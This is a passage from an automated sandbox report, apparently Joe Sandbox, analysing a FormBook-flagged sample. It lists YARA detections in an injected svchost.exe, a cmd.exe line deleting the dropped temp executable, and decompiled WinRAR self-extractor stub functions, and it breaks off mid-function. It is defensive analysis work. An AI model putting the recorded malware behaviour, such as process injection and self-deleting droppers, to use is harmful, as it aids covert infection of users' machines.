File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: svchost.exePID: 4024, Parent PID: 3092

General

Target ID:	13
Start time:	15:59:35
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe
Imagebase:	0x350000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 1244, Parent PID: 4024

General

Target ID:	14
Start time:	15:59:38
Start date:	03/10/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\AppData\Local\Temp\bstkiooen.exe"
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6092, Parent PID: 1244

General

Target ID:	15
Start time:	15:59:38
Start date:	03/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: primosdv3.1.1.0.exePID: 5604, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.1%
Total number of Nodes:	1513
Total number of Limit Nodes:	38

Executed Functions

Function 00C7DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E00C7DF1E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t40;
				void* _t41;
				long _t50;
				void* _t53;
				intOrPtr _t57;
				struct HWND__* _t73;
				void* _t74;
				WCHAR* _t92;
				struct HINSTANCE__* _t93;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t120;

				_t120 = __fp0;
				_t86 = __edx;
				E00C70863(__edx, 1);
				E00C7A64D("C:\Users\hardz\Desktop", 0x800);
				_t75 =  &_v208;
				E00C7AC16( &_v208); // executed
				_t73 = 0;
				E00C7FFF0(0x7104, 0xcb7b80, 0, 0x7104);
				_t101 = _t100 + 0xc;
				_t92 = GetCommandLineW();
				_t105 = _t92;
				if(_t92 != 0) {
					_push(_t92);
					E00C7C5C4(0, _t105);
					if( *0xcaa471 == 0) {
						E00C7DBDE(__eflags, _t92);
					} else {
						_t98 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t98 != 0) {
							UnmapViewOfFile(_t74);
							_t73 = 0;
						}
						CloseHandle(_t98);
					}
				}
				GetModuleFileNameW(_t73, 0xcbec90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xcbec90); // executed
				GetLocalTime(_t101 + 0xc);
				_push( *(_t101 + 0x1a) & 0x0000ffff);
				_push( *(_t101 + 0x1c) & 0x0000ffff);
				_push( *(_t101 + 0x1e) & 0x0000ffff);
				_push( *(_t101 + 0x20) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				_push( *(_t101 + 0x22) & 0x0000ffff);
				E00C64092(_t101 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t101 + 0x24) & 0x0000ffff);
				_t102 = _t101 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t102 + 0x7c);
				_t93 = GetModuleHandleW(_t73);
				 *0xca102c = _t93;
				 *0xca1028 = _t93; // executed
				_t40 = LoadIconW(_t93, 0x64); // executed
				 *0xcb7b7c = _t40; // executed
				_t41 = E00C7B6DD(_t75, _t86, _t120); // executed
				 *0xcbec84 = _t41;
				E00C6DA42(0xca1030, _t86, 0, 0xcbec90);
				E00C790B7(0);
				E00C790B7(0);
				 *0xca8440 = _t102 + 0x5c;
				 *0xca8444 = _t102 + 0x30; // executed
				DialogBoxParamW(_t93, L"STARTDLG", _t73, E00C7B7E0, _t73); // executed
				 *0xca8444 = _t73;
				 *0xca8440 = _t73;
				E00C79178(_t102 + 0x24);
				E00C79178(_t102 + 0x50);
				_t50 =  *0xcbfca8;
				if(_t50 != 0) {
					Sleep(_t50);
				}
				if( *0xca9468 != 0) {
					E00C7AE2F(0xcbec90);
				}
				E00C6F279(0xcb7a78);
				if( *0xcbfca0 > 0) {
					L00C7EE5C( *0xcbfc90);
				}
				DeleteObject( *0xcb7b7c);
				_t53 =  *0xcbec84;
				if(_t53 != 0) {
					DeleteObject(_t53);
				}
				if( *0xca1098 == 0 &&  *0xca8454 != 0) {
					E00C66D83(0xca1098, 0xff);
				}
				_t54 =  *0xcbfcac;
				 *0xca8454 = 1;
				if( *0xcbfcac != 0) {
					E00C7DC3B(_t54);
					CloseHandle( *0xcbfcac);
				}
				_t94 =  *0xca1098;
				if( *0xcb7b7a != 0) {
					_t57 =  *0xc9e728; // 0x3e8
					if( *0xcb7b7b == 0) {
						__eflags = _t57;
						if(_t57 < 0) {
							_t94 = _t94 - _t57;
							__eflags = _t94;
						}
					} else {
						_t94 =  *0xcbfca4;
						if(_t57 > 0) {
							_t94 = _t94 + _t57;
						}
					}
				}
				E00C7AC7C(_t102 + 0x1c); // executed
				return _t94;
			}

0x00c7df1e
0x00c7df1e
0x00c7df29
0x00c7df38
0x00c7df3d
0x00c7df41
0x00c7df4b
0x00c7df54
0x00c7df59
0x00c7df62
0x00c7df64
0x00c7df66
0x00c7df68
0x00c7df69
0x00c7df74
0x00c7dfe1
0x00c7df76
0x00c7df89
0x00c7df8d
0x00c7dfce
0x00c7dfd4
0x00c7dfd4
0x00c7dfd7
0x00c7dfdd
0x00c7df74
0x00c7dff2
0x00c7dffe
0x00c7e009
0x00c7e014
0x00c7e01a
0x00c7e020
0x00c7e026
0x00c7e02c
0x00c7e032
0x00c7e048
0x00c7e04d
0x00c7e05a
0x00c7e067
0x00c7e06c
0x00c7e072
0x00c7e078
0x00c7e07e
0x00c7e083
0x00c7e08e
0x00c7e093
0x00c7e09c
0x00c7e0a5
0x00c7e0b5
0x00c7e0c4
0x00c7e0c9
0x00c7e0d3
0x00c7e0d9
0x00c7e0df
0x00c7e0e8
0x00c7e0ed
0x00c7e0f4
0x00c7e0f7
0x00c7e0f7
0x00c7e104
0x00c7e106
0x00c7e106
0x00c7e110
0x00c7e11c
0x00c7e124
0x00c7e129
0x00c7e130
0x00c7e136
0x00c7e13d
0x00c7e140
0x00c7e140
0x00c7e14d
0x00c7e162
0x00c7e162
0x00c7e167
0x00c7e16c
0x00c7e175
0x00c7e178
0x00c7e183
0x00c7e183
0x00c7e190
0x00c7e196
0x00c7e19f
0x00c7e1a4
0x00c7e1b4
0x00c7e1b6
0x00c7e1b8
0x00c7e1b8
0x00c7e1b8
0x00c7e1a6
0x00c7e1a6
0x00c7e1ae
0x00c7e1b0
0x00c7e1b0
0x00c7e1ae
0x00c7e1a4
0x00c7e1be
0x00c7e1ce

APIs

Part of subcall function 00C70863: GetModuleHandleW.KERNEL32(kernel32), ref: 00C7087C
Part of subcall function 00C70863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C7088E
Part of subcall function 00C70863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C708BF

Part of subcall function 00C7A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00C7A655

Part of subcall function 00C7AC16: OleInitialize.OLE32(00000000), ref: 00C7AC2F
Part of subcall function 00C7AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7AC66
Part of subcall function 00C7AC16: SHGetMalloc.SHELL32(00CA8438), ref: 00C7AC70

GetCommandLineW.KERNEL32 ref: 00C7DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00C7DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00C7DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 00C7DFCE

Part of subcall function 00C7DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00C7DBF4
Part of subcall function 00C7DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C7DC30

CloseHandle.KERNEL32(00000000), ref: 00C7DFD7
GetModuleFileNameW.KERNEL32(00000000,00CBEC90,00000800), ref: 00C7DFF2
SetEnvironmentVariableW.KERNELBASE(sfxname,00CBEC90), ref: 00C7DFFE
GetLocalTime.KERNEL32(?), ref: 00C7E009
_swprintf.LIBCMT ref: 00C7E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00C7E05A
GetModuleHandleW.KERNEL32(00000000), ref: 00C7E061
LoadIconW.USER32(00000000,00000064), ref: 00C7E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00C7E0C9
Sleep.KERNEL32(?), ref: 00C7E0F7
DeleteObject.GDI32 ref: 00C7E130
DeleteObject.GDI32(?), ref: 00C7E140
CloseHandle.KERNEL32 ref: 00C7E183

Strings

sfxname, xrefs: 00C7DFF9
C:\Users\user\Desktop, xrefs: 00C7DF33
sfxstime, xrefs: 00C7E055
winrarsfxmappingfile.tmp, xrefs: 00C7DF77
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00C7E039
STARTDLG, xrefs: 00C7E0BE

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-586660713
Opcode ID: 1476f43bb1f77d307457de0c4a0e26a6570f4691e622d8e319ba9b9e8cec24c5
Instruction ID: 0012b75273cf2d8300130dc8b2e8d2c05701a177c899774862f619a227f1bb82
Opcode Fuzzy Hash: 1476f43bb1f77d307457de0c4a0e26a6570f4691e622d8e319ba9b9e8cec24c5
Instruction Fuzzy Hash: 08610971904345AFD720ABB4EC4EF6F3BACEB49744F04442AF90A922A2DB749E44D761

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A6C2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00C7A6C2(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t27;
				char* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t39;
				long _t44;
				intOrPtr* _t45;
				struct HRSRC__* _t46;

				_t46 = FindResourceW( *0xca1028, _a4, "PNG");
				if(_t46 == 0) {
					L15:
					return 0;
				}
				_t44 = SizeofResource( *0xca1028, _t46);
				if(_t44 == 0) {
					goto L15;
				}
				_t17 = LoadResource( *0xca1028, _t46);
				if(_t17 == 0) {
					goto L15;
				}
				_t18 = LockResource(_t17);
				_t47 = _t18;
				if(_t18 == 0) {
					goto L15;
				}
				_v4 = 0;
				_t19 = GlobalAlloc(2, _t44); // executed
				_t36 = _t19;
				if(_t36 == 0) {
					L14:
					return _v4;
				}
				if(GlobalLock(_t36) == 0) {
					L13:
					GlobalFree(_t36);
					goto L14;
				}
				E00C80320(_t21, _t47, _t44);
				_v8 = 0;
				_push( &_v8);
				_push(0);
				_push(_t36);
				if( *0xcc3180() == 0) {
					_t27 = E00C7A626(_t25, _t38, _v20, 0); // executed
					_t39 = _v28;
					_t45 = _t27;
					 *0xc93278(_t39);
					 *((intOrPtr*)( *((intOrPtr*)( *_t39 + 8))))();
					if(_t45 != 0) {
						 *((intOrPtr*)(_t45 + 8)) = 0;
						if( *((intOrPtr*)(_t45 + 8)) == 0) {
							_push(0xffffff);
							_t34 =  &_v20;
							_push(_t34);
							_push( *((intOrPtr*)(_t45 + 4)));
							L00C7EB26(); // executed
							if(_t34 != 0) {
								 *((intOrPtr*)(_t45 + 8)) = _t34;
							}
						}
						 *0xc93278(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t45))))();
					}
				}
				GlobalUnlock(_t36);
				goto L13;
			}

0x00c7a6db
0x00c7a6df
0x00c7a7db
0x00000000
0x00c7a7db
0x00c7a6f2
0x00c7a6f6
0x00000000
0x00000000
0x00c7a703
0x00c7a70b
0x00000000
0x00000000
0x00c7a712
0x00c7a718
0x00c7a71c
0x00000000
0x00000000
0x00c7a729
0x00c7a72d
0x00c7a733
0x00c7a737
0x00c7a7d3
0x00000000
0x00c7a7d8
0x00c7a746
0x00c7a7cc
0x00c7a7cd
0x00000000
0x00c7a7cd
0x00c7a74f
0x00c7a757
0x00c7a75f
0x00c7a760
0x00c7a761
0x00c7a76a
0x00c7a771
0x00c7a776
0x00c7a77a
0x00c7a784
0x00c7a78a
0x00c7a78e
0x00c7a793
0x00c7a798
0x00c7a79a
0x00c7a79f
0x00c7a7a3
0x00c7a7a4
0x00c7a7a7
0x00c7a7ae
0x00c7a7b0
0x00c7a7b0
0x00c7a7ae
0x00c7a7bb
0x00c7a7c3
0x00c7a7c3
0x00c7a78e
0x00c7a7c6
0x00000000

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6D5
SizeofResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6EC
LoadResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A703
LockResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00C7B73D,00000066), ref: 00C7A72D
GlobalLock.KERNEL32 ref: 00C7A73E
GlobalUnlock.KERNEL32(00000000), ref: 00C7A7C6

Part of subcall function 00C7A626: GdipAlloc.GDIPLUS(00000010), ref: 00C7A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7A7A7
GlobalFree.KERNEL32 ref: 00C7A7CD

Strings

PNG, xrefs: 00C7A6C6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: 93403ed0e4d4cacf813c0aac72e50c6307656658c2c8e67a5d3d5b5188330a28
Instruction ID: de377fa7529e38a5a7d18413790a3c35afe18b5b20bd184b6998947ec92ce97b
Opcode Fuzzy Hash: 93403ed0e4d4cacf813c0aac72e50c6307656658c2c8e67a5d3d5b5188330a28
Instruction Fuzzy Hash: A2319E75600342BFC7149F21EC8DF2F7BB8EF84750B04851AF91982620EB31DD449AA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C6A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00C6A69B(void* _a4, WCHAR* _a8, intOrPtr _a12) {
				intOrPtr _v572;
				intOrPtr _v580;
				intOrPtr _v588;
				struct _WIN32_FIND_DATAW _v596;
				short _v4692;
				int _t44;
				int _t49;
				signed int _t61;
				signed int _t62;
				void* _t63;
				long _t66;
				signed int _t78;
				void* _t79;
				intOrPtr _t80;
				void* _t81;

				E00C7EC50(0x1250);
				_t81 = _a4;
				_t79 = _t78 | 0xffffffff;
				_push( &_v596);
				if(_t81 != _t79) {
					_t44 = FindNextFileW(_t81, ??);
					__eflags = _t44;
					if(_t44 != 0) {
						L12:
						_t80 = _a12;
						E00C70602(_t80, _a8, 0x800);
						_push(0x800);
						E00C6C310(__eflags, _t80,  &(_v596.cFileName));
						_t49 = 0 + _v596.nFileSizeLow;
						__eflags = _t49;
						 *(_t80 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *(_t80 + 0x1008) = _v596.dwFileAttributes;
						 *((intOrPtr*)(_t80 + 0x1004)) = _v596.nFileSizeHigh;
						 *((intOrPtr*)(_t80 + 0x1028)) = _v596.ftCreationTime;
						 *((intOrPtr*)(_t80 + 0x102c)) = _v588;
						 *((intOrPtr*)(_t80 + 0x1030)) = _v596.ftLastAccessTime;
						 *((intOrPtr*)(_t80 + 0x1034)) = _v580;
						 *((intOrPtr*)(_t80 + 0x1038)) = _v596.ftLastWriteTime;
						 *((intOrPtr*)(_t80 + 0x103c)) = _v572;
						E00C715DA(_t80 + 0x1010,  &(_v596.ftLastWriteTime));
						E00C715DA(_t80 + 0x1018,  &(_v596.ftCreationTime));
						E00C715DA(_t80 + 0x1020,  &(_v596.ftLastAccessTime));
						L13:
						 *(_t80 + 0x1040) =  *(_t80 + 0x1040) & 0x00000000;
						return _t81;
					}
					_t81 = _t79;
					_t61 = GetLastError();
					__eflags = _t61 - 0x12;
					_t62 = _t61 & 0xffffff00 | _t61 != 0x00000012;
					L9:
					_t80 = _a12;
					 *(_t80 + 0x1044) = _t62;
					goto L13;
				}
				_t63 = FindFirstFileW(_a8, ??); // executed
				_t81 = _t63;
				if(_t81 != _t79) {
					goto L12;
				}
				if(E00C6BB03(_a8,  &_v4692, 0x800) == 0) {
					L4:
					_t66 = GetLastError();
					if(_t66 == 2 || _t66 == 3 || _t66 == 0x12) {
						_t62 = 0;
						__eflags = 0;
					} else {
						_t62 = 1;
					}
					goto L9;
				}
				_t81 = FindFirstFileW( &_v4692,  &_v596);
				if(_t81 != _t79) {
					goto L12;
				}
				goto L4;
			}

0x00c6a6a3
0x00c6a6aa
0x00c6a6b4
0x00c6a6bc
0x00c6a6bf
0x00c6a728
0x00c6a72e
0x00c6a730
0x00c6a742
0x00c6a742
0x00c6a74a
0x00c6a74f
0x00c6a758
0x00c6a765
0x00c6a765
0x00c6a76b
0x00c6a777
0x00c6a77a
0x00c6a786
0x00c6a792
0x00c6a79e
0x00c6a7aa
0x00c6a7b6
0x00c6a7c2
0x00c6a7ce
0x00c6a7db
0x00c6a7ed
0x00c6a7ff
0x00c6a804
0x00c6a804
0x00c6a811
0x00c6a811
0x00c6a732
0x00c6a734
0x00c6a73a
0x00c6a73d
0x00c6a719
0x00c6a719
0x00c6a71c
0x00000000
0x00c6a71c
0x00c6a6c4
0x00c6a6ca
0x00c6a6ce
0x00000000
0x00000000
0x00c6a6e2
0x00c6a6fe
0x00c6a6fe
0x00c6a707
0x00c6a717
0x00c6a717
0x00c6a713
0x00c6a713
0x00c6a713
0x00000000
0x00c6a707
0x00c6a6f8
0x00c6a6fc
0x00000000
0x00000000
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6C4

Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27

FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A728
GetLastError.KERNEL32(?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A734

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: d11b3b73514be654e6c45e8acb80266631693e5837e3e36045cc788253fff3a2
Instruction ID: 8dc71403fbfe9721b366b309b80ccbb0a9c9e536af3ba3b6b109c9c5bd9007b0
Opcode Fuzzy Hash: d11b3b73514be654e6c45e8acb80266631693e5837e3e36045cc788253fff3a2
Instruction Fuzzy Hash: E4415B72900555ABCB25DF68CCC8BEAB7B8FB48350F144296E96DE3240D734AE94DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C87DEE Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C87DEE(int _a4) {
				void* _t14;
				void* _t15;
				void* _t17;
				void* _t18;
				void* _t19;

				if(E00C8B076(_t14, _t15, _t17, _t18, _t19) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00C87E73(_t15, _a4);
				ExitProcess(_a4);
			}

0x00c87dfa
0x00c87e16
0x00c87e16
0x00c87e1f
0x00c87e28

APIs

GetCurrentProcess.KERNEL32(?,?,00C87DC4,?,00C9C300,0000000C,00C87F1B,?,00000002,00000000), ref: 00C87E0F
TerminateProcess.KERNEL32(00000000,?,00C87DC4,?,00C9C300,0000000C,00C87F1B,?,00000002,00000000), ref: 00C87E16
ExitProcess.KERNEL32 ref: 00C87E28

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e0ec2470514da5bc901d64663d3243f7ac90f84eec74d81c17b9939ebe49a333
Instruction ID: 54d7062191c5b88ce0d9234d79ac783ae75b93b2f4709b713d3771ae9e5c736e
Opcode Fuzzy Hash: e0ec2470514da5bc901d64663d3243f7ac90f84eec74d81c17b9939ebe49a333
Instruction Fuzzy Hash: 84E0B631004188EFCF117F64DD0EB4E7F6AEB51386B104555F8198A132DB3ADE52DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00C6848E Relevance: 2.5, APIs: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00C6848E(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t383;
				signed int _t387;
				signed int _t392;
				signed int _t398;
				void* _t400;
				signed int _t401;
				signed int _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t411;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				signed int _t431;
				signed int _t432;
				signed int _t435;
				signed int _t436;
				signed int _t442;
				signed int _t445;
				signed int _t446;
				char _t448;
				signed int _t449;
				signed int _t450;
				signed int _t473;
				signed int _t482;
				intOrPtr _t485;
				signed int _t495;
				char _t500;
				char _t501;
				void* _t508;
				void* _t515;
				void* _t517;
				signed int _t525;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t534;
				signed int _t536;
				signed int _t543;
				signed int _t552;
				signed int _t554;
				signed int _t556;
				signed int _t558;
				signed char _t559;
				signed int _t562;
				void* _t567;
				signed int _t573;
